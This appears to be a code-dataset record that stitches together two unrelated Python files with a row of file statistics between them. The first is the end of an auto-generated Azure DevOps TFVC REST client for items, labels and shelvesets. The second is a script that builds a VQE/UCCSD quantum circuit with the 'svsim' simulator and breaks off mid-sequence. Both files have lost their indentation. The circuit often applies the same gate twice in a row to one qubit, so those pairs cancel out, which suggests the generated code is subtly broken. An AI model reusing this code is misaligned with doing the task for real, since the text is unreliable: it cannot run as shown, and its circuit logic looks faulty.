query_parameters['versionDescriptor.versionType'] = version_descriptor.version_type
if version_descriptor.version is not None:
query_parameters['versionDescriptor.version'] = version_descriptor.version
response = self._send(http_method='GET',
location_id='ba9fc436-9a38-4578-89d6-e4f3241f5040',
version='4.0',
route_values=route_values,
query_parameters=query_parameters,
accept_media_type='text/plain')
if "callback" in kwargs:
callback = kwargs["callback"]
else:
callback = None
return self._client.stream_download(response, callback=callback)
def get_item_zip(self, path, project=None, file_name=None, download=None, scope_path=None, recursion_level=None, version_descriptor=None, **kwargs):
"""GetItemZip.
Get Item Metadata and/or Content for a single item. The download parameter is to indicate whether the content should be available as a download or just sent as a stream in the response. Doesn't apply to zipped content which is always returned as a download.
:param str path:
:param str project: Project ID or project name
:param str file_name:
:param bool download:
:param str scope_path:
:param str recursion_level:
:param :class:`<TfvcVersionDescriptor> <tfvc.v4_0.models.TfvcVersionDescriptor>` version_descriptor:
:rtype: object
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
query_parameters = {}
if path is not None:
query_parameters['path'] = self._serialize.query('path', path, 'str')
if file_name is not None:
query_parameters['fileName'] = self._serialize.query('file_name', file_name, 'str')
if download is not None:
query_parameters['download'] = self._serialize.query('download', download, 'bool')
if scope_path is not None:
query_parameters['scopePath'] = self._serialize.query('scope_path', scope_path, 'str')
if recursion_level is not None:
query_parameters['recursionLevel'] = self._serialize.query('recursion_level', recursion_level, 'str')
if version_descriptor is not None:
if version_descriptor.version_option is not None:
query_parameters['versionDescriptor.versionOption'] = version_descriptor.version_option
if version_descriptor.version_type is not None:
query_parameters['versionDescriptor.versionType'] = version_descriptor.version_type
if version_descriptor.version is not None:
query_parameters['versionDescriptor.version'] = version_descriptor.version
response = self._send(http_method='GET',
location_id='ba9fc436-9a38-4578-89d6-e4f3241f5040',
version='4.0',
route_values=route_values,
query_parameters=query_parameters,
accept_media_type='application/zip')
if "callback" in kwargs:
callback = kwargs["callback"]
else:
callback = None
return self._client.stream_download(response, callback=callback)
def get_label_items(self, label_id, top=None, skip=None):
"""GetLabelItems.
Get items under a label.
:param str label_id: Unique identifier of label
:param int top: Max number of items to return
:param int skip: Number of items to skip
:rtype: [TfvcItem]
"""
route_values = {}
if label_id is not None:
route_values['labelId'] = self._serialize.url('label_id', label_id, 'str')
query_parameters = {}
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if skip is not None:
query_parameters['$skip'] = self._serialize.query('skip', skip, 'int')
response = self._send(http_method='GET',
location_id='06166e34-de17-4b60-8cd1-23182a346fda',
version='4.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('[TfvcItem]', self._unwrap_collection(response))
def get_label(self, label_id, request_data, project=None):
"""GetLabel.
Get a single deep label.
:param str label_id: Unique identifier of label
:param :class:`<TfvcLabelRequestData> <tfvc.v4_0.models.TfvcLabelRequestData>` request_data: maxItemCount
:param str project: Project ID or project name
:rtype: :class:`<TfvcLabel> <tfvc.v4_0.models.TfvcLabel>`
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
if label_id is not None:
route_values['labelId'] = self._serialize.url('label_id', label_id, 'str')
query_parameters = {}
if request_data is not None:
if request_data.label_scope is not None:
query_parameters['requestData.labelScope'] = request_data.label_scope
if request_data.name is not None:
query_parameters['requestData.name'] = request_data.name
if request_data.owner is not None:
query_parameters['requestData.owner'] = request_data.owner
if request_data.item_label_filter is not None:
query_parameters['requestData.itemLabelFilter'] = request_data.item_label_filter
if request_data.max_item_count is not None:
query_parameters['requestData.maxItemCount'] = request_data.max_item_count
if request_data.include_links is not None:
query_parameters['requestData.includeLinks'] = request_data.include_links
response = self._send(http_method='GET',
location_id='a5d9bd7f-b661-4d0e-b9be-d9c16affae54',
version='4.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('TfvcLabel', response)
def get_labels(self, request_data, project=None, top=None, skip=None):
"""GetLabels.
Get a collection of shallow label references.
:param :class:`<TfvcLabelRequestData> <tfvc.v4_0.models.TfvcLabelRequestData>` request_data: labelScope, name, owner, and itemLabelFilter
:param str project: Project ID or project name
:param int top: Max number of labels to return
:param int skip: Number of labels to skip
:rtype: [TfvcLabelRef]
"""
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'str')
query_parameters = {}
if request_data is not None:
if request_data.label_scope is not None:
query_parameters['requestData.labelScope'] = request_data.label_scope
if request_data.name is not None:
query_parameters['requestData.name'] = request_data.name
if request_data.owner is not None:
query_parameters['requestData.owner'] = request_data.owner
if request_data.item_label_filter is not None:
query_parameters['requestData.itemLabelFilter'] = request_data.item_label_filter
if request_data.max_item_count is not None:
query_parameters['requestData.maxItemCount'] = request_data.max_item_count
if request_data.include_links is not None:
query_parameters['requestData.includeLinks'] = request_data.include_links
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if skip is not None:
query_parameters['$skip'] = self._serialize.query('skip', skip, 'int')
response = self._send(http_method='GET',
location_id='a5d9bd7f-b661-4d0e-b9be-d9c16affae54',
version='4.0',
route_values=route_values,
query_parameters=query_parameters)
return self._deserialize('[TfvcLabelRef]', self._unwrap_collection(response))
def get_shelveset_changes(self, shelveset_id, top=None, skip=None):
"""GetShelvesetChanges.
Get changes included in a shelveset.
:param str shelveset_id: Shelveset's unique ID
:param int top: Max number of changes to return
:param int skip: Number of changes to skip
:rtype: [TfvcChange]
"""
query_parameters = {}
if shelveset_id is not None:
query_parameters['shelvesetId'] = self._serialize.query('shelveset_id', shelveset_id, 'str')
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if skip is not None:
query_parameters['$skip'] = self._serialize.query('skip', skip, 'int')
response = self._send(http_method='GET',
location_id='dbaf075b-0445-4c34-9e5b-82292f856522',
version='4.0',
query_parameters=query_parameters)
return self._deserialize('[TfvcChange]', self._unwrap_collection(response))
def get_shelveset(self, shelveset_id, request_data=None):
"""GetShelveset.
Get a single deep shelveset.
:param str shelveset_id: Shelveset's unique ID
:param :class:`<TfvcShelvesetRequestData> <tfvc.v4_0.models.TfvcShelvesetRequestData>` request_data: includeDetails, includeWorkItems, maxChangeCount, and maxCommentLength
:rtype: :class:`<TfvcShelveset> <tfvc.v4_0.models.TfvcShelveset>`
"""
query_parameters = {}
if shelveset_id is not None:
query_parameters['shelvesetId'] = self._serialize.query('shelveset_id', shelveset_id, 'str')
if request_data is not None:
if request_data.name is not None:
query_parameters['requestData.name'] = request_data.name
if request_data.owner is not None:
query_parameters['requestData.owner'] = request_data.owner
if request_data.max_comment_length is not None:
query_parameters['requestData.maxCommentLength'] = request_data.max_comment_length
if request_data.max_change_count is not None:
query_parameters['requestData.maxChangeCount'] = request_data.max_change_count
if request_data.include_details is not None:
query_parameters['requestData.includeDetails'] = request_data.include_details
if request_data.include_work_items is not None:
query_parameters['requestData.includeWorkItems'] = request_data.include_work_items
if request_data.include_links is not None:
query_parameters['requestData.includeLinks'] = request_data.include_links
response = self._send(http_method='GET',
location_id='e36d44fb-e907-4b0a-b194-f83f1ed32ad3',
version='4.0',
query_parameters=query_parameters)
return self._deserialize('TfvcShelveset', response)
def get_shelvesets(self, request_data=None, top=None, skip=None):
"""GetShelvesets.
Return a collection of shallow shelveset references.
:param :class:`<TfvcShelvesetRequestData> <tfvc.v4_0.models.TfvcShelvesetRequestData>` request_data: name, owner, and maxCommentLength
:param int top: Max number of shelvesets to return
:param int skip: Number of shelvesets to skip
:rtype: [TfvcShelvesetRef]
"""
query_parameters = {}
if request_data is not None:
if request_data.name is not None:
query_parameters['requestData.name'] = request_data.name
if request_data.owner is not None:
query_parameters['requestData.owner'] = request_data.owner
if request_data.max_comment_length is not None:
query_parameters['requestData.maxCommentLength'] = request_data.max_comment_length
if request_data.max_change_count is not None:
query_parameters['requestData.maxChangeCount'] = request_data.max_change_count
if request_data.include_details is not None:
query_parameters['requestData.includeDetails'] = request_data.include_details
if request_data.include_work_items is not None:
query_parameters['requestData.includeWorkItems'] = request_data.include_work_items
if request_data.include_links is not None:
query_parameters['requestData.includeLinks'] = request_data.include_links
if top is not None:
query_parameters['$top'] = self._serialize.query('top', top, 'int')
if skip is not None:
query_parameters['$skip'] = self._serialize.query('skip', skip, 'int')
response = self._send(http_method='GET',
location_id='e36d44fb-e907-4b0a-b194-f83f1ed32ad3',
version='4.0',
query_parameters=query_parameters)
return self._deserialize('[TfvcShelvesetRef]', self._unwrap_collection(response))
def get_shelveset_work_items(self, shelveset_id):
"""GetShelvesetWorkItems.
Get work items associated with a shelveset.
:param str shelveset_id: Shelveset's unique ID
:rtype: [AssociatedWorkItem]
"""
query_parameters = {}
if shelveset_id is not None:
query_parameters['shelvesetId'] = self._serialize.query('shelveset_id', shelveset_id, 'str')
response = self._send(http_method='GET',
location_id='a7a0c1c1-373e-425a-b031-a519474d743d',
version='4.0',
query_parameters=query_parameters)
return self._deserialize('[AssociatedWorkItem]', self._unwrap_collection(response))
| 56.746575
| 265
| 0.630416
| 4,536
| 41,425
| 5.535494
| 0.077381
| 0.10096
| 0.052332
| 0.06412
| 0.856705
| 0.847903
| 0.83707
| 0.816122
| 0.799395
| 0.791589
| 0
| 0.018637
| 0.272058
| 41,425
| 729
| 266
| 56.824417
| 0.814028
| 0.192251
| 0
| 0.873518
| 0
| 0
| 0.138833
| 0.066996
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047431
| false
| 0
| 0.005929
| 0
| 0.102767
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
e6eed11252cadff312444bf36bdde91223809a1b
| 255,942
|
py
|
Python
|
svsim/tool/vqe_uccsd_n8.py
|
yukwangmin/SV-Sim
|
1b6b71cb490e7a1eac3d6ebc24777590d48378de
|
[
"MIT"
] | null | null | null |
svsim/tool/vqe_uccsd_n8.py
|
yukwangmin/SV-Sim
|
1b6b71cb490e7a1eac3d6ebc24777590d48378de
|
[
"MIT"
] | null | null | null |
svsim/tool/vqe_uccsd_n8.py
|
yukwangmin/SV-Sim
|
1b6b71cb490e7a1eac3d6ebc24777590d48378de
|
[
"MIT"
] | null | null | null |
import sys
import svsim_py_omp_wrapper as svsim
if (len(sys.argv) != 3):
print('$python circuit.py n_qubits n_gpus')
exit()
sim = svsim.Simulation(int(sys.argv[1]), int(sys.argv[2]))
sim.append(sim.H(3))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.691361, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.H(3))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(3))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.691361, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.Y(3))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(3))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.691361, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.H(3))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(3))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.691361, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.Y(3))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(3))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.691361, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.Y(3))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(3))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.691361, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.H(3))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(3))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.691361, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.Y(3))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(3))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(4.691361, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.H(3))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.093191, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.093191, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(4))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.093191, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(4))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.093191, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.093191, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.Y(2))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.093191, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.H(2))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(4))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.093191, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.H(2))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(4))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.093191, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.Y(2))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.779911, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.779911, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(4))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.779911, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(4))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.779911, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.779911, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.779911, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(4))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.779911, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(4))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(2.779911, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(3, 1))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.4688447, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.4688447, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.H(4))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.4688447, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.Y(4))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.4688447, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.4688447, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.H(0))
sim.append(sim.H(0))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.4688447, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.Y(0))
sim.append(sim.Y(0))
sim.append(sim.Y(4))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.4688447, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.H(3))
sim.append(sim.H(0))
sim.append(sim.Y(0))
sim.append(sim.H(4))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(1, 0))
sim.append(sim.RZ(0.4688447, 0))
sim.append(sim.CX(1, 0))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.Y(3))
sim.append(sim.Y(0))
sim.append(sim.H(0))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.9386544, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.9386544, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.H(4))
sim.append(sim.Y(3))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.9386544, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.Y(3))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.Y(4))
sim.append(sim.H(3))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.9386544, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.H(3))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.9386544, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.Y(3))
sim.append(sim.H(1))
sim.append(sim.H(1))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.9386544, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.H(4))
sim.append(sim.H(3))
sim.append(sim.Y(1))
sim.append(sim.Y(1))
sim.append(sim.Y(4))
sim.append(sim.H(3))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
sim.append(sim.RZ(0.9386544, 1))
sim.append(sim.CX(2, 1))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(4, 3))
sim.append(sim.Y(4))
sim.append(sim.H(3))
sim.append(sim.H(1))
sim.append(sim.Y(1))
sim.append(sim.H(4))
sim.append(sim.Y(3))
sim.append(sim.Y(1))
sim.append(sim.H(1))
sim.append(sim.CX(4, 3))
sim.append(sim.CX(3, 2))
sim.append(sim.CX(2, 1))
